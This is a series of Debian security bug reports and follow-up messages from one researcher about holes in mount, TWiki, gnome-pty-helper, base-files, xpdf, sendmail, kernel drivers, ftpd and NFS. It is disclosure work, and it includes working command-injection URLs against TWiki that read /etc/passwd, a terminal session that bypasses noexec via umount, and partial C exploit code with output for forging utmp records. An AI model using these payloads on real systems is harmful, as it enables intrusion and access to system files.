Bug#328141: mount: umount -r drops nosuid flag
Package: mount Version: 2.11n-7 Severity: critical File: /bin/umount Tags: security Justification: root security hole Please see http://www.securityfocus.com/archive/1/410333 for details. Verified (that noexec flag is gone) as follows: psz:~$ id uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),24(cdrom),25(floppy) psz:~$ grep cdrom /etc/fstab /dev/cdrom /cdrom iso9660 ro,user,noauto 0 0 psz:~$ /bin/mount /cdrom psz:~$ /bin/mount | grep cdrom /dev/cdrom on /cdrom type iso9660 (ro,noexec,nosuid,nodev,user=psz) psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin bash: /cdrom/ML3/ML_30_013_Linuxi.bin: /bin/sh: bad interpreter: Permission denied psz:~$ cd /cdrom psz:/cdrom$ /bin/umount -r /cdrom umount: /dev/cdrom busy - remounted read-only psz:/cdrom$ cd psz:~$ /bin/mount | grep cdrom /dev/cdrom on /cdrom type iso9660 (ro) psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin Unpacking to /tmp/ML.tar... [ctrl-C] psz:~$ /bin/umount -r /cdrom psz:~$ -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux pisa.maths.usyd.edu.au 2.4.27-smssvr1.6 #1 SMP Wed Aug 24 12:16:31 EST 2005 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages mount depends on: ii libc6 2.2.5-11.8 GNU C Library: Shared libraries an -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#328557: twiki: TWiki Remote Command Execution Vulnerability
Package: twiki Version: 20030201-6 Severity: critical Justification: root security hole Please see http://www.securityfocus.com/archive/1/410721 Verified with http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cless%20/etc/passwd http://iw/iw/view/Main/TWikiUsers?rev=3D2%20%7Cps%20aux|cat%20--%20-%20 that it allows access as www-data, the apache user. -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-spb0.3 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages twiki depends on: ii apache-common 1.3.33-6sarge1 support files for all Apache webse ii debconf 1.4.30.13 Debian configuration management sy ii libalgorithm-diff-perl1.19.01-1 a perl library for finding Longest ii libdigest-sha1-perl 2.10-1 NIST SHA-1 message digest algorith ii perl [libmime-base64-perl 5.8.4-8Larry Wall's Practical Extraction ii perl-modules [libnet-perl 5.8.4-8Core Perl modules ii rcs 5.7-15 The GNU Revision Control System -- debconf information: * twiki/apacheUserCreationNote: * twiki/samplefiles: true * twiki/wikiwebmaster: [EMAIL PROTECTED] * twiki/defaultUrlHost: http://iw.maths.usyd.edu.au -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#328557: twiki: TWiki Remote Command Execution Vulnerability
Sven, > why are you running a totally outdated twiki package? Because I am an idiot, with a badly mis-configured APT! (That I inherited this machine recently is no excuse.) Thanks for putting me on the right path: now all fixed. Sorry about the wasted bandwidth. Please close this bug. Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole
gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.
Demo output, code below.
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
OUTPUT:
[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep
psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2Sep 20 08:40 (xyz)
psz pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ?S08:14 0:00 xterm -T [EMAIL
PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz 31444 0.0 0.0 1484 380 pts/1S08:21 0:00
gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1S08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1R+ 08:21 0:00 ps aux
[1]+ Donegnome-pty-helper-exploit xyz
psz pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
CODE:
/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/
#include
#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4
/* Pid of the helper SUID process */
static pid_t helper_pid;
/* The socketpair used for the protocol */
int helper_socket_protocol [2];
/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];
#include
#include
static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)
static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];
iov [0].iov_base = buf;
iov [0].iov_len = sizeof (buf);
msg.msg_iov = iov;
msg.msg_iovlen = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;
if (recvmsg (helper_fd, &msg, 0) <= 0)
return -1;
return *(int *) CMSG_DATA (cmptr);
}
static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}
static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;
if (helper_pid == -1)
return NULL;
if (helper_pid == 0){
if (s_pipe (helper_socket_protocol) == -1)
return NULL;
if (s_pipe (helper_socket_fdpassing) == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
return NULL;
}
helper_pid = fork ();
if (helper_pid == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
return NULL;
}
if (helper_pid == 0){
close (0);
close (1);
dup2 (helper_socket_protocol [1], 0);
dup2 (helper_socket_fdpassing [1], 1);
/* Close aliases */
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
execl ("/usr/sbin/gnome-pty-helper",
"gnome-pty-helper", NULL);
exit (1);
} else {
close (helper_socket_fdpassing [1]);
close (helper_socket_protocol [1]);
/*
* Set the close-on-exec flag for the other
* descriptors, these should never propagate
* (otherwise gnome-pty-heler wont notice when
* this process is killed)
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Steve, >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing >> existing records. > > Why is this filed at severity: critical? What is the attack vector here > which permits root privilege escalation? I do not know any root escalation methods. When using reportbug, those options seemed to fit best, apologies if they were not; please change if appropriate. (For future reference: which options should I have used instead?) (In fact cannot think of any attacks: cannot think of any "important" uses of utmp/wtmp files. I use utmp in some of my own scripts, that is how I looked at gnome-tty-helper.) Cheers, Paul Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Dear Loic, > Do you have a CVE ID for this security issue? No. Sorry, I do not know how to get one. (Nor am sure if this is serious enough to deserve one.) > Did you check whether libvte4 is affected? No. Do not know what libvte4 is. > Do you have a fix? No. (Fanciful idea: try running xhost, if it fails then surely you do not "own" that display. Slow, maybe secure. That is what I use now.) Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Dear Loic,
>> > Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too. Let me know if you don't have a setup
> permitting the check, or if you lack the time.
Looking at the source
vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c
in line 682 it grabs
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#328141: acknowledged by developer (Bug#329063: fixed in util-linux 2.12p-8)
Dear Debian Security, Quoting from http://www.debian.org/security/ : Debian takes security very seriously. Most security problems brought to our attention are corrected within 48 hours. Can we please have a DSA for this problem? Thanks, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#329156: gnome-pty-helper foo
Joey, > Could somebody explain the security implication for me? > > being able to write arbitrary strings into valid records without > overwriting any other data in utmp/wtmp can hardly be classified > as a security vulnerability. It depends on what trust you place in the correctness of utmp/wtmp. Knowing that records are often left behind (not cleaned up or closed), you may have grown to regard them as useless data. However in that case they should be abandoned: getting rid of many setuid/setgid objects, improving security. (Records left behind may be regarded as a security issue: how do you know when all users are off and it is "safe" to reboot?) Some people would like to rely on utmp/wtmp correctness. If I see user X doing something funny: do I run to office A or office B? Some academics (foolishly?) like to allocate "participation marks" (attendance records) to students in their tutorial: based on utmp/wtmp, that is surely useless. When allowing users access to USB sticks on their "thin client" terminals, how do I know if they "own" (are logged in to) that particular terminal: run xhost and check return status, wasting resources... As I commented elsewhere, I do not think any Debian utilities ever use utmp/wtmp. Are you then at freedom to abandon them? Viewed another way: users are not meant to be able to write fake utmp/wtmp records. But they can. Anything that users can do, without authority, is a security issue. Any unexpected behaviour is a potential security issue. > (Apart from that, I'm only slightly annoyed as I had to learn about > this via MITRE / GNOME Bugzilla instead of a mail from the maintainer > to the security team?) Would I have been allowed to contact the security team directly? Are not all security-tagged bug reports monitored, as a matter of course? (Are they knowledgeable to advise on your questions above?) Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#299007: base-files: Insecure PATH in /root/.profile
Package: base-files
Version: 3.0.2
Severity: critical
Tags: patch security
Justification: root security hole
I recently noticed that /usr/local and /usr/local/{bin,sbin} are
group-writable and owned by root:staff. This is wrong: those directories
are in the default PATH for root. They (and files within) should be
root-owned: group staff users or become-any-user-but-root bugs should not
be able to trojan and thus get root.
The Debian Policy Manual [1] says:
... /usr/local take precedence over the equivalents in /usr.
... should have permissions 2775 and be owned by root.staff.
but it [2] also says:
... make sure that [it] is secure ...
Files should be owned by root.root ... mode 644 or 755.
Directories should be mode 755 or 2775 ... owned by the group that needs
write access to it.
The Debian Reference [3] and Securing Debian Manual [4], [5] say
[group] staff is ... for helpdesk types or junior sysadmins ... to do
things in /usr/local and to create directories in /home.
[group] staff: Allows users to add local modifications to the system
(/usr/local, /home) without needing root privileges.
The 'staff' group are usually help-desk/junior sysadmins, allowing them
to work in /usr/local and create directories in /home.
(This is surely wrong, seems a SysV left-over: you need root privileges to
chown user directories in /home or in fact to create users in /etc/passwd.)
"Junior sysadmins" should not be able or encouraged to trojan root, even if
you trust them with the root password or give them sudo privileges.
Become-any-user-but-root and become-any-group-but-root bugs are quite
common. When a group of machines share user home directories via NFS
exported from somewhere with default root-squash, getting root on one
machine gives precisely that on all others of the group. There have been
"genuine" such bugs also e.g. in sendmail [6].
This security lapse has been discussed before [7], [8].
The solution is to remove /usr/local things from the default PATH in
/root/.profile (i.e. in /usr/share/base-files/dot.profile), leaving a
warning comment instead.
It would also be good to re-word the confused policy, and to make
/usr/local root-owned. (Maybe /usr/local/sbin could then be used again.)
Discuss on debian-policy@lists.debian.org, or "reportbug debian-policy"?
References:
[1] http://www.debian.org/doc/debian-policy/ch-opersys.html#s9.1.2
[2] http://www.debian.org/doc/debian-policy/ch-files.html#s10.9
[3] http://www.debian.org/doc/manuals/reference/ch-tune.en.html#s9.2.3
[4]
http://www.debian.org/doc/manuals/securing-debian-howto/ch11.en.html#s11.1.12.1
[5]
http://www.debian.org/doc/manuals/securing-debian-howto/ch11.en.html#s11.1.12.2
[6] http://hackersplayground.org/papers/sendmailholes.txt
[7] http://lists.debian.org/debian-doc/2001/08/msg00041.html
[8] http://lists.debian.org/debian-user/2003/12/msg02057.html
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23
13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages base-files depends on:
ii base-passwd 3.4.1 Debian Base System Password/Group
ii gawk [awk]1:3.1.0-3 GNU awk, a pattern scanning and pr
ii mawk [awk]1.3.3-8a pattern scanning and text proces
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#342281: xpdf-reader: security issues by iDefense
Package: xpdf-reader Version: 3.00-13 Severity: critical Justification: causes serious data loss Arbitrary code execution (with privileges as user of package) issues reported by iDefense: Multiple Vendor xpdf DCTStream Baseline Heap Overflow Vulnerability Multiple Vendor xpdf DCTStream Progressive Heap Overflow Multiple Vendor xpdf StreamPredictor Heap Overflow Vulnerability Multiple Vendor xpdf JPX Stream Reader Heap Overflow Vulnerability http://www.idefense.com/application/poi/display?id=342 http://www.idefense.com/application/poi/display?id=343 http://www.idefense.com/application/poi/display?id=344 http://www.idefense.com/application/poi/display?id=345 (Debian, both woody and sarge, is specifically mentioned as vulnerable.) Reported also on public mailing lists, see http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/ http://www.securityfocus.com/archive/1 Upstream/vendor patches are apparently available. Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-spm0.5 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages xpdf-reader depends on: ii gsfonts8.14+v8.11+urw-0.2Fonts for the Ghostscript interpre ii lesstif2 1:0.93.94-11.4OSF/Motif 2.1 implementation relea ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libfreetype6 2.1.7-2.4 FreeType 2 font engine, shared lib ii libgcc11:3.4.3-13GCC support library ii libice64.3.0.dfsg.1-14sarge1 Inter-Client Exchange library ii libpaper1 1.1.14-3 Library for handling paper charact ii libsm6 4.3.0.dfsg.1-14sarge1 X Window System Session Management ii libstdc++5 1:3.3.5-13The GNU Standard C++ Library v3 ii libt1-55.0.2-3 Type 1 font rasterizer library - r ii libx11-6 4.3.0.dfsg.1-14sarge1 X Window System protocol client li ii libxext6 4.3.0.dfsg.1-14sarge1 X Window System miscellaneous exte ii libxp6 4.3.0.dfsg.1-14sarge1 X Window System printing extension ii libxpm44.3.0.dfsg.1-14sarge1 X pixmap library ii libxt6 4.3.0.dfsg.1-14sarge1 X Toolkit Intrinsics ii xlibs 4.3.0.dfsg.1-14sarge1 X Keyboard Extension (XKB) configu ii xpdf-common3.00-13 Portable Document Format (PDF) sui ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#358440: sendmail: race, exec arbitrary, fixed 8.13.6
Package: sendmail
Version: 8.13.4-3
Severity: critical
Justification: root security hole
Please see the following advisories/reports:
http://www.auscert.org.au/6148
http://xforce.iss.net/xforce/alerts/id/216
http://www.sendmail.org/8.13.6.html
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- Package-specific info:
Ouput of /usr/share/bug/sendmail/script:
ls -alR /etc/mail:
/etc/mail:
total 272
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 .
drwxr-xr-x 91 root root 8192 Mar 20 22:47 ..
-rwxr-xr-- 1 root smmsp 9116 Dec 2 09:21 Makefile
-rw--- 1 root root 4211 Dec 2 09:22 access
-rw-r- 1 smmta smmsp 12288 Dec 2 09:22 access.db
-rw-r--r-- 1 root root281 Jun 4 2005 address.resolve
lrwxrwxrwx 1 root smmsp10 Dec 2 09:22 aliases -> ../aliases
-rw-r- 1 smmta smmsp 12288 Dec 2 09:22 aliases.db
-rw-r--r-- 1 root root 3058 Dec 2 09:21 databases
-rw-r--r-- 1 root root 5588 Jun 4 2005 helpfile
-rw-r--r-- 1 root smmsp35 Dec 2 09:22 local-host-names
drwxr-sr-x 2 smmta smmsp 4096 Dec 2 09:21 m4
drwxr-xr-x 2 root root 4096 Dec 2 09:21 peers
drwxr-xr-x 2 root smmsp 4096 Jun 4 2005 sasl
-rw-r--r-- 1 root smmsp 8198 Dec 2 09:22 sendmail.cf
-rw-r--r-- 1 root smmsp 269 Dec 2 09:22 sendmail.cf.errors
-rw-r--r-- 1 root root 10032 May 6 2002 sendmail.conf
-rw-r--r-- 1 root smmsp46 Dec 2 09:22 sendmail.mc
-rw-r--r-- 1 root root149 Jun 4 2005 service.switch
-rw-r--r-- 1 root root180 Jun 4 2005 service.switch-nodns
drwxr-sr-x 2 smmta smmsp 4096 Dec 2 09:21 smrsh
-rw-r--r-- 1 root smmsp 7794 Dec 2 09:22 submit.cf
-rw-r--r-- 1 root smmsp59 Dec 2 09:22 submit.mc
drwxr-xr-x 2 smmta smmsp 4096 Dec 2 09:21 tls
-rw-r--r-- 1 root smmsp 0 Dec 2 09:22 trusted-users
/etc/mail/m4:
total 8
drwxr-sr-x 2 smmta smmsp 4096 Dec 2 09:21 .
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 ..
-rw-r- 1 root smmsp0 Dec 2 09:21 dialup.m4
-rw-r- 1 root smmsp0 Dec 2 09:21 provider.m4
/etc/mail/peers:
total 12
drwxr-xr-x 2 root root 4096 Dec 2 09:21 .
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 ..
-rw-r--r-- 1 root root 328 Jun 4 2005 provider
/etc/mail/sasl:
total 8
drwxr-xr-x 2 root smmsp 4096 Jun 4 2005 .
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 ..
/etc/mail/smrsh:
total 8
drwxr-sr-x 2 smmta smmsp 4096 Dec 2 09:21 .
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 ..
lrwxrwxrwx 1 root smmsp 26 Dec 2 09:21 mail.local ->
/usr/lib/sm.bin/mail.local
lrwxrwxrwx 1 root smmsp 17 Dec 2 09:21 procmail -> /usr/bin/procmail
lrwxrwxrwx 1 root smmsp 17 Dec 2 09:21 vacation -> /usr/bin/vacation
/etc/mail/tls:
total 44
drwxr-xr-x 2 smmta smmsp 4096 Dec 2 09:21 .
drwxr-sr-x 7 smmta smmsp 4096 Dec 2 09:22 ..
-rw-r--r-- 1 root root 7 Dec 2 09:21 no_prompt
-rw--- 1 root root 1191 Dec 2 09:21 sendmail-client.cfg
-rw-r--r-- 1 root smmsp 1245 Dec 2 09:21 sendmail-client.crt
-rw--- 1 root root 1025 Dec 2 09:21 sendmail-client.csr
-rw-r- 1 root smmsp 1679 Dec 2 09:21 sendmail-common.key
-rw--- 1 root root 0 Dec 2 09:21 sendmail-common.prm
-rw--- 1 root root 1191 Dec 2 09:21 sendmail-server.cfg
-rw-r--r-- 1 root smmsp 1245 Dec 2 09:21 sendmail-server.crt
-rw--- 1 root root 1025 Dec 2 09:21 sendmail-server.csr
-rwxr--r-- 1 root root 3152 Dec 2 09:21 starttls.m4
sendmail.conf:
DAEMON_MODE="Daemon";
DAEMON_PARMS="";
DAEMON_HOSTSTATS="Yes";
DAEMON_MAILSTATS="No";
QUEUE_MODE="${DAEMON_MODE}";
QUEUE_INTERVAL="10";
QUEUE_PARMS="";
MSP_MODE="${QUEUE_MODE}";
MSP_INTERVAL="${QUEUE_INTERVAL}";
MSP_PARMS="${QUEUE_PARMS}";
MSP_MAILSTATS="No";
MISC_PARMS="";
CRON_MAILTO="root";
CRON_PARMS="";
AGE_DATA="";
DAEMON_STATS="${DAEMON_MAILSTATS}";
MSP_STATS="${MSP_MAILSTATS}";
sendmail.mc:
[trigger for usr/share/sendmail/sm_helper.sh]
submit.mc...
FEATURE(`msp [trigger for usr/share/sendmail/sm_helper.sh]
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages sendmail depends on:
ii rmail 8.13.4-3 MTA->UUCP remote mail handler
ii sendmail-base 8.13.4-3 powerful, efficient, and scalable
ii sendmail-bin 8.13.4-3 powerful, efficient, and scalable
ii sendmail-cf 8.13.4-3 powerful, efficient, and scalable
ii sensible-mda 8.13.4-3 Mail Delivery Agent wrapper
Versions of packages sensible-mda depends on:
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
ii procmail
Bug#402094: kernel-source-2.6.8: Intel drivers (net/e100.c, net/e1000/e1000_main.c)
Package: kernel-source-2.6.8 Version: 2.6.8-16sarge5 Severity: critical Justification: root security hole Noticed: Intel LAN Driver Buffer Overflow Local Privilege Escalation http://support.intel.com/support/network/sb/CS-023726.htm The Intel blurb says Linux, and specifically Debian, is affected also: Product Family OS Affected Driver Versions Corrected Driver Versions Intel PRO 10/100 Adapters Linux* 3.5.14 or previous3.5.17 or later Intel PRO/1000 AdaptersLinux 7.2.7 or previous 7.3.15 or later and it seems that: kernel-source-2.6.8/drivers/net/e100.c #define DRV_NAME"e100" #define DRV_VERSION "3.0.18" #define DRV_DESCRIPTION "Intel(R) PRO/100 Network Driver" #define DRV_COPYRIGHT "Copyright(c) 1999-2004 Intel Corporation" kernel-source-2.6.8/drivers/net/e1000/e1000_main.c char e1000_driver_name[] = "e1000"; char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver"; char e1000_driver_version[] = "5.2.52-k4"; char e1000_copyright[] = "Copyright (c) 1999-2004 Intel Corporation."; are quite old (so seem to be affected). Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-spm1.6 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages kernel-source-2.6.8 depends on: ii binutils 2.15-6 The GNU assembler, linker and bina ii bzip2 1.0.2-7high-quality block-sorting file co ii coreutils [fileutils] 5.2.1-2The GNU core utilities ii fileutils 5.2.1-2The GNU file management utilities -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384454: closed by Alberto Gonzalez Iniesta <[EMAIL PROTECTED]> (Bug#384454: fixed in linux-ftpd 0.17-20sarge2)
Dear Maintainer, Yes, the bug in the patch was mine: meant to check the return status of setgid(getegid()) but somehow managed to mis-type that into setgid(geteuid()). Stupid mistake. Shame on me. Now, linux-ftpd_0.17-20sarge2.diff.gz was dated September 2006 as per your latest "closure" message http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=384454;msg=44 (or maybe 20 Nov 2006 as per http://www.debian.org/security/2006/dsa-1217 or 13 Nov 2006 as the date on current http://security.debian.org/pool/updates/main/l/linux-ftpd/linux-ftpd_0.17-20sarge2.diff.gz ) and contains the "wrong" patch. So this seems fixed in etch 0.17-23 since 25 Nov 2006, but not yet in sarge (==stable) 0.17-20sarge2. Please fix for sarge also. Thanks, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384454: ftpd (was Bug#384454)
Dear Security team, A stupid little bug crept into (was left in) #384454 and DSA-1217. My fault originally: I humbly apologize. Please correct it for sarge. Thanks, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384454: ftpd (was Bug#384454)
Dear Security team, > A stupid little bug crept into (was left in) #384454 and DSA-1217. > My fault originally: I humbly apologize. Please correct it for sarge. Please see also: http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052578.html (and bugtraq if/when they accept). Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384454: ftpd (was Bug#384454)
Dear Security team, I wrote: > A stupid little bug crept into (was left in) #384454 and DSA-1217. > My fault originally: I humbly apologize. Please correct it for sarge. > Please see also: > http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052578.html > (and bugtraq if/when they accept). Bugtraq accepted also: http://www.securityfocus.com/archive/1/460742 Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384922: nfs-kernel-server: root_squash is broken
Package: nfs-kernel-server Version: 1:1.0.6-3.1 Severity: critical Justification: root security hole NFS uses root_squash by default, in part (mainly?) so as to make it more difficult to create a setuid-root file in a writable export: protect the exporting server from a compromise of the mounting client. With Debian policy, group staff is root-equivalent: an evil client could create a setgid-staff file, and with that trojanize /usr/local/bin (drop a suitable ls or xterm or bash file). There is a warning in "man exports" against other sensitive UIDs, but not against sensitive GIDs. There are no sensitive UIDs on a default Debian installation, but there is a sensitive GID mandated by policy; there is no default or easy gid_squash on NFS exports. The intended security benefit of root_squash is defeated. (This is not really a bug in NFS, but a result of broken policy; maybe NFS could document the issue, or help change policy.) Please see also bug#299007 http://bugs.debian.org/299007 . Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-spm1.5 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages nfs-kernel-server depends on: ii debconf 1.4.30.13Debian configuration management sy ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libwrap07.6.dbs-8Wietse Venema's TCP wrappers libra ii nfs-common 1:1.0.6-3.1 NFS support files common to client ii sysvinit2.86.ds1-1 System-V like init -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#384922: nfs-kernel-server: root_squash is broken
Please see also http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/049079.html Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
